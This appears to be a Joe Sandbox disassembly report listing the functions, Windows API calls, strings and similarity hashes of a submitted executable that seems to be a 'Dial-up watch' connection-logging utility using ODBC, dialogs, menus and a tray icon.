lstrcmpA.KERNEL32(00000000,004592A8,?,?,?,?,004494A4,00000000), ref: 004494E8

Strings

dde, xrefs: 00449515
Unregserver, xrefs: 00449509
Unregister, xrefs: 004494FD
Embedding, xrefs: 00449530
Automation, xrefs: 0044954B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: lstrcmp
String ID: Automation$Embedding$Unregister$Unregserver$dde
API String ID: 1534048567-1842294661
Opcode ID: 7d7ba5bea8dff0600f86261a6c698b72101ce855a3d283e35647602ede70bfa5
Instruction ID: 2b269b044efaa165d0e3824fb1f583863cc07953cef3e1d728226e52666c0e07
Opcode Fuzzy Hash: 7d7ba5bea8dff0600f86261a6c698b72101ce855a3d283e35647602ede70bfa5
Instruction Fuzzy Hash: 2411C6B2240301B6FB20AB718C45F27769C6B40786F300D5BB80692642D7BCED05962D

Function 00402DC0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 237windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402DA0: SendMessageA.USER32(?,00001009,00000000,00000000), ref: 00402DAD

SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00402E25

Part of subcall function 0042C6B0: _wctomb_s.LIBCMT ref: 0042C6D8

Part of subcall function 0042D59C: SendMessageA.USER32(?,00001007,00000000,?), ref: 0042D5DE

Part of subcall function 0042F253: InterlockedDecrement.KERNEL32(-000000F4), ref: 0042F267

Part of subcall function 0042D5E8: SendMessageA.USER32(?,0000102E,?,?), ref: 0042D609

Part of subcall function 0042F38C: InterlockedIncrement.KERNEL32(-000000F4), ref: 0042F3CF

Part of subcall function 0042C584: wsprintfA.USER32 ref: 0042C637

GetWindowLongA.USER32(?,000000F0), ref: 00402FD3
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00402FEA
SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00402FFD
SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040300B
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040301A
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403040

Strings

%d-%m-%Y, xrefs: 00402E72
Total:, xrefs: 0040304A
%H:%M:%S, xrefs: 00402EA6, 00402F22, 00402F61, 0040305D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageSend$InterlockedLongWindow$DecrementIncrement_wctomb_swsprintf
String ID: %H:%M:%S$%d-%m-%Y$Total:
API String ID: 1697767590-1477320215
Opcode ID: 6c4ea00f35a465829b2b34a599450983822cfa366bd19707f40294b4ae5c3195
Instruction ID: 43d4dc6570965df83d4d3a408255acb4f2d6fa4d6a85e8041f792baca30ca7e9
Opcode Fuzzy Hash: 6c4ea00f35a465829b2b34a599450983822cfa366bd19707f40294b4ae5c3195
Instruction Fuzzy Hash: BA81C370348301AFD314DF15CC52F6BB7E8AB88B44F504A1EF695572C0DAB8E945CBAA

Function 00435DBC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 194windowstringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00435DC1
GetMenuStringA.USER32(?,00000000,00000000,00000100,00000100), ref: 00435E0A

Part of subcall function 0042F65E: lstrlenA.KERNEL32(?,00000100,00433FDB,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 0042F671

Part of subcall function 0042F482: __EH_prolog.LIBCMT ref: 0042F487

DeleteMenu.USER32(?,?,00000000), ref: 00435E5F
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00435E77
lstrlenA.KERNEL32(?), ref: 00435E84
wsprintfA.USER32 ref: 00435F49
GetMenuItemCount.USER32(00000001), ref: 00435FC4
InsertMenuA.USER32(00000002,00000000,00000400,00000002,00000000), ref: 00435F97

Part of subcall function 0042F253: InterlockedDecrement.KERNEL32(-000000F4), ref: 0042F267

Strings

\, xrefs: 00435E90
&%d , xrefs: 00435F43

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Menu$H_prologlstrlen$CountCurrentDecrementDeleteDirectoryInsertInterlockedItemStringwsprintf
String ID: &%d $\
API String ID: 3188129661-1982479665
Opcode ID: 1691bfb2c7291bdfba18cb9246116089760b70fb8270e99c698ae99a704cee0b
Instruction ID: d281a326ebf9fcbad5255db30a49eaa90f1bd3ead3cf0738faa7217ceae3243e
Opcode Fuzzy Hash: 1691bfb2c7291bdfba18cb9246116089760b70fb8270e99c698ae99a704cee0b
Instruction Fuzzy Hash: 3B71E174A00749EFCB11DF64C895AAEBBF5FF08308F14816EE45A97291C735EA48CB64

Function 00401240 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

#24.ODBC32(00000003,?,?,INSERT INTO Connection (ConnectionName, ConnectionDate, ConnectionDuration) VALUES (?, ?, ?)), ref: 00401290
#19.ODBC32(?,00000000,000000FD,00000000,00000003,?,?,INSERT INTO Connection (ConnectionName, ConnectionDate, ConnectionDuration) VALUES (?, ?, ?)), ref: 004012B0
#72.ODBC32(?,00000001,00000001,00000001,00000001,000000FF,00000000,00000000,?,?,00000000,?,00000000,000000FD,00000000,00000003), ref: 00401345
#72.ODBC32(?,00000002,00000001,0000000B,0000000B,00000000,00000000,?,00000010,00000010,?,00000001,00000001,00000001,00000001,000000FF), ref: 0040137E

Part of subcall function 00401040: #36.ODBC32(?,?,00000001,00000000,00000000,?,000001FF,0000007F), ref: 0040109F

#16.ODBC32(?,00000002,00000000,00000003,?,00000000,00000001,?,00000000,?,?,00000003,00000001,00000004,00000004,00000000), ref: 004013FD
#31.ODBC32(00000003,?,?,00000002,00000000,00000003,?,00000000,00000001,?,00000000,?,?,00000003,00000001,00000004), ref: 00401408

Strings

INSERT INTO Connection (ConnectionName, ConnectionDate, ConnectionDuration) VALUES (?, ?, ?), xrefs: 00401268

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID:
String ID: INSERT INTO Connection (ConnectionName, ConnectionDate, ConnectionDuration) VALUES (?, ?, ?)
API String ID: 0-591847520
Opcode ID: bec5ba652c75d8039db9d4494f97632271e8d973b127be9f94df68f5f9642e80
Instruction ID: 603d42b3dce3653ed5bf414abcda2b50b287b03e047658692a462b0c985681cf
Opcode Fuzzy Hash: bec5ba652c75d8039db9d4494f97632271e8d973b127be9f94df68f5f9642e80
Instruction Fuzzy Hash: E551D471A40209BEEB24DA94CD52FFF7778EB44B00F50426DBA01BB2C1CAB85E45C769

Function 0042FB1D Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 175COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042FB22
GetSystemMetrics.USER32(0000002A), ref: 0042FBD4
GlobalLock.KERNEL32(?,?,00000000,?), ref: 0042FC5E
CreateDialogIndirectParamA.USER32(?,?,?,Function_0002F862,00000000), ref: 0042FC90

Part of subcall function 0042F253: InterlockedDecrement.KERNEL32(-000000F4), ref: 0042F267

DestroyWindow.USER32(00458358,?,?,00000000,?), ref: 0042FD07
GlobalUnlock.KERNEL32(?,?,?,00000000,?), ref: 0042FD18
GlobalFree.KERNEL32(?), ref: 0042FD21

Strings

Helv, xrefs: 0042FC08
MS Sans Serif, xrefs: 0042FBF5
MS Shell Dlg, xrefs: 0042FBE2

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
String ID: Helv$MS Sans Serif$MS Shell Dlg
API String ID: 2343056566-2894235370
Opcode ID: 08395fae719d30318b4c666c64c7bc749f212a34f7c1591c9d6dc3d56c3ddc0c
Instruction ID: ab7d102679c0dffdab354a98649835c423fcd73dc8590cb43f91c637d4524228
Opcode Fuzzy Hash: 08395fae719d30318b4c666c64c7bc749f212a34f7c1591c9d6dc3d56c3ddc0c
Instruction Fuzzy Hash: 56618531A0021ADFCF14EFA5E995AEEBBB1FF04305F90443FE901A2251D7789A45CB59

Function 0040D930 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

Dial-up watch, xrefs: 0040D9F7

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID:
String ID: Dial-up watch
API String ID: 0-2010764294
Opcode ID: 8581746f370993cddf297a0abf389f21ea5e9a01f47d939264690e179ccdbf3b
Instruction ID: 8b796a18586fcaa615f265313780847280d198251bd01acd9234933f33279074
Opcode Fuzzy Hash: 8581746f370993cddf297a0abf389f21ea5e9a01f47d939264690e179ccdbf3b
Instruction Fuzzy Hash: F151A471204701ABD324DF64CC51F67B7A4AB84710F108A2EF556A72C2DB38F809CB6A

Function 00411CC8 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60windowlibraryloaderCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,The ODBC installer DLL (ODBCCP32.DLL) is not installed on this system.,ODBC Installer Error,00000040), ref: 00411CF7
GetProcAddress.KERNEL32(00000000,?), ref: 00411D05
GetModuleFileNameA.KERNEL32(?,00000105), ref: 00411D2B
GetModuleHandleW.KERNEL32(00000000), ref: 00411D2F
GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 00411D3E
wsprintfA.USER32 ref: 00411D5D
MessageBoxA.USER32(00000000,?,ODBC Installer Error,00000040), ref: 00411D76

Part of subcall function 00411D83: GetSystemDirectoryA.KERNEL32(?,00000105), ref: 00411DA0
Part of subcall function 00411D83: wsprintfA.USER32 ref: 00411DC5
Part of subcall function 00411D83: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,10000080,00000000), ref: 00411DE1
Part of subcall function 00411D83: GetFileSize.KERNEL32(00000000,00000000), ref: 00411DF7
Part of subcall function 00411D83: CloseHandle.KERNEL32(00000000), ref: 00411E01
Part of subcall function 00411D83: wsprintfA.USER32 ref: 00411E51
Part of subcall function 00411D83: MoveFileExA.KERNEL32(?,?,00000003(MOVEFILE_REPLACE_EXISTING|MOVEFILE_COPY_ALLOWED)), ref: 00411E66
Part of subcall function 00411D83: FreeLibrary.KERNEL32(00000000), ref: 00411E6D
Part of subcall function 00411D83: LoadLibraryA.KERNEL32 ref: 00411E7B
Part of subcall function 00411D83: LoadLibraryA.KERNEL32(?), ref: 00411E89

Strings

The ODBC installer DLL (ODBCCP32.DLL) is not installed on this system., xrefs: 00411CF1
ODBC Installer Error, xrefs: 00411CEC, 00411D6E
The program %s, or one of its DLLs attempted to call the function %s which is not supported in the loaded ODBC installer DLL (%s). Press OK to proceed., xrefs: 00411D57

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: File$LibraryModulewsprintf$HandleLoadMessageName$AddressCloseCreateDirectoryFreeMoveProcSizeSystem
String ID: ODBC Installer Error$The ODBC installer DLL (ODBCCP32.DLL) is not installed on this system.$The program %s, or one of its DLLs attempted to call the function %s which is not supported in the loaded ODBC installer DLL (%s). Press OK to proceed.
API String ID: 3733943183-1126289664
Opcode ID: 4980e8c1777cee74e4883a5779a13e5a2be3e64ffec26e33e4e5ed79a909135e
Instruction ID: 313b1e7f728fe20490a8d09ed307ac3108b075fb913a22cce9b3309d70b167c0
Opcode Fuzzy Hash: 4980e8c1777cee74e4883a5779a13e5a2be3e64ffec26e33e4e5ed79a909135e
Instruction Fuzzy Hash: 86114271541608BFDB109B61ED49FDB3BBCDB48742F000066FA09E2161E774EA808FA9

Function 0042AE80 Relevance: 16.7, APIs: 11, Instructions: 199COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,00000000), ref: 0042AEC4
CallWindowProcA.USER32(00000000), ref: 0042AEE9

Part of subcall function 00428280: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 004282A6
Part of subcall function 00428280: RemovePropA.USER32(?,00000000), ref: 004282BE
Part of subcall function 00428280: RemovePropA.USER32(?,00000000), ref: 004282CA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: ca1ff01a7fff6f3dbfd74e72523885e695a0d8ecc781a9b711e67bfdf6e9c9c5
Instruction ID: 112030d6c2aedcd4ff49c4ab896757954f3cf21fb5b294ee917447cd42d3607e
Opcode Fuzzy Hash: ca1ff01a7fff6f3dbfd74e72523885e695a0d8ecc781a9b711e67bfdf6e9c9c5
Instruction Fuzzy Hash: 2051ADB6600220AFD210DB44EC84D7FB7B8FB89725F84442EFD4583211E679A8458BA7

Function 0042B210 Relevance: 16.6, APIs: 11, Instructions: 140windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0042B21E
GetClientRect.USER32(?,?), ref: 0042B239
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0042B26B
SelectObject.GDI32(?,00000000), ref: 0042B279
SetBkMode.GDI32(?,00000002), ref: 0042B28A
GetParent.USER32(?), ref: 0042B298
SendMessageA.USER32(00000000), ref: 0042B29F
SelectObject.GDI32(?,00000000), ref: 0042B2A9
SelectObject.GDI32(?,00000000), ref: 0042B2CB
SelectObject.GDI32(?,00000000), ref: 0042B2DB
OffsetRect.USER32(?,000000FF,000000FF), ref: 0042B332

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ObjectSelect$MessageRectSend$ClientLongModeOffsetParentWindow
String ID:
API String ID: 3606012576-0
Opcode ID: fb499b05b841fd8bfbc6098247159423e3331b228569e02e852fadc3d3a2a100
Instruction ID: c6655637bdd0306bf14851c66cdb17ae1d4895796a7e56f318a8ac2d8616c6d5
Opcode Fuzzy Hash: fb499b05b841fd8bfbc6098247159423e3331b228569e02e852fadc3d3a2a100
Instruction Fuzzy Hash: 9D413C723043157FD210AB48AC46F7F776CEB85B25FC4006DFA01961D2DB69E90587BA

Function 00428981 Relevance: 16.6, APIs: 11, Instructions: 107COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000FC), ref: 0042899D
RemovePropA.USER32(?,00000000), ref: 004289D3
SetWindowLongA.USER32(?,000000FC,00000000), ref: 004289D9
RemovePropA.USER32(?,00000000), ref: 00428A07
SetWindowLongA.USER32(?,000000FC,00000000), ref: 00428A0D
GetWindow.USER32(?,00000005), ref: 00428A62
GetWindow.USER32(00000000,00000002), ref: 00428A73

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$Long$PropRemove
String ID:
API String ID: 3256693057-0
Opcode ID: e0de319fb16cd6d7da1fe891e736fb76dc4dc63a81d68247f5bb6afe990ce3fc
Instruction ID: 79ef997ebff9f1643c72f09c3be83782c906e13875baa5f8a0f03a135d89a11d
Opcode Fuzzy Hash: e0de319fb16cd6d7da1fe891e736fb76dc4dc63a81d68247f5bb6afe990ce3fc
Instruction Fuzzy Hash: F021046A3125356ED701A7747C10E7F229CDB86365B51013BF900D2251FF69DC428B7E

Function 00449C0E Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 199registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044B888

Part of subcall function 00435963: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0043597D
Part of subcall function 00435963: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00435995

RegQueryValueA.ADVAPI32(80000000,?,00000000,00000208), ref: 0044BA46

Strings

%s\ShellNew, xrefs: 0044BA79
%s\shell\printto\%s, xrefs: 0044B9A5, 0044B9FC
%s\shell\print\%s, xrefs: 0044B984, 0044B9DF
%s\DefaultIcon, xrefs: 0044B928
command, xrefs: 0044B8C5, 0044B9BB, 0044B9D8, 0044B9F5
%s\shell\open\%s, xrefs: 0044B963, 0044B9C2
ddeexec, xrefs: 0044B958, 0044B979, 0044B99A

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Name$FileH_prologModulePathQueryShortValue
String ID: %s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$command$ddeexec
API String ID: 365916388-556638191
Opcode ID: c7c71dcabcf3aa061f6d37927519a1950bf4beead4d0e47c9e4b43833132ba22
Instruction ID: 5c64a00fe520585cfc656664eadb27df93c5862afa6ee67eecdda427422f1101
Opcode Fuzzy Hash: c7c71dcabcf3aa061f6d37927519a1950bf4beead4d0e47c9e4b43833132ba22
Instruction Fuzzy Hash: 70719E71E0021A9BDF14EBE5CC45AAFBBB5EF14305F50042EF414B3292D7789A18CBA9

Function 004053B0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(?,00000000,?), ref: 004053F2
LoadIconA.USER32(?,000000C6), ref: 00405434

Part of subcall function 0040D630: GetVersion.KERNEL32(00000000,00405449,?,00000402,?,00000000), ref: 0040D633

Part of subcall function 0042F2C1: lstrlenA.KERNEL32(?,?,00000000,?,0040127F,INSERT INTO Connection (ConnectionName, ConnectionDate, ConnectionDuration) VALUES (?, ?, ?)), ref: 0042F2EB

Part of subcall function 0040E280: RegCreateKeyA.ADVAPI32(80000002,00000000,00000000), ref: 0040E2DD
Part of subcall function 0040E280: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?,?), ref: 0040E317
Part of subcall function 0040E280: RegCloseKey.ADVAPI32(?), ref: 0040E32E

SendMessageA.USER32(?,00000404,0000E107,00000001), ref: 00405552
SendMessageA.USER32(?,00000404,00008005,00000001), ref: 00405564
RemoveMenu.USER32(?,00008004,00000000,00000000,Dial-up watch,00000054,00000080), ref: 004055A8
RemoveMenu.USER32(?,00000000,00000400), ref: 004055B5

Part of subcall function 0040D790: Shell_NotifyIconA.SHELL32(00000002,?), ref: 0040D7A7

Part of subcall function 0042F253: InterlockedDecrement.KERNEL32(-000000F4), ref: 0042F267

Strings

Dial-up watch, xrefs: 00405400, 0040557E
ShowIcon, xrefs: 00405452
Settings, xrefs: 00405468

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Menu$IconMessageRemoveSend$CloseCreateDecrementInterlockedLoadNotifyQueryShell_SystemValueVersionlstrlen
String ID: Dial-up watch$Settings$ShowIcon
API String ID: 2649428831-2334501252
Opcode ID: 4878803a15c9dec69b9ac805c1cea5ee7dc456921106323a712b41ee3380ecc4
Instruction ID: d60b99e748f3da6fd273f2f7dc28d6a9f81c7fca58a68c130b7453d518fbfef7
Opcode Fuzzy Hash: 4878803a15c9dec69b9ac805c1cea5ee7dc456921106323a712b41ee3380ecc4
Instruction Fuzzy Hash: 165108713407006BE610AF258C52F6F77D5AF84B18F004A2EFA557B2C2DEB8A8058B5E

Function 00413EFA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 121stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413EFF
GetStockObject.GDI32(00000011), ref: 00413F32
GetStockObject.GDI32(0000000D), ref: 00413F3D
GetObjectA.GDI32(00409EC0,0000003C,?), ref: 00413F6B
lstrlenA.KERNEL32(?), ref: 00413F88
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 00413FAD
GetDeviceCaps.GDI32(?,0000005A), ref: 00414003
#253.OLEPRO32(00000020,0045C810,?,?,?,00000001), ref: 0041402F

Strings

, xrefs: 00413F74

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Object$Stock$#253ByteCapsCharDeviceH_prologMultiWidelstrlen
String ID:
API String ID: 274612576-3916222277
Opcode ID: cc809ef339df7f6a7751b18b9cf55fb03e99098539627b2966120dbe8cc02b14
Instruction ID: 27929c57391e1f387a01eb536f055f826dbbf50e438003f64c08ba18b0593c1a
Opcode Fuzzy Hash: cc809ef339df7f6a7751b18b9cf55fb03e99098539627b2966120dbe8cc02b14
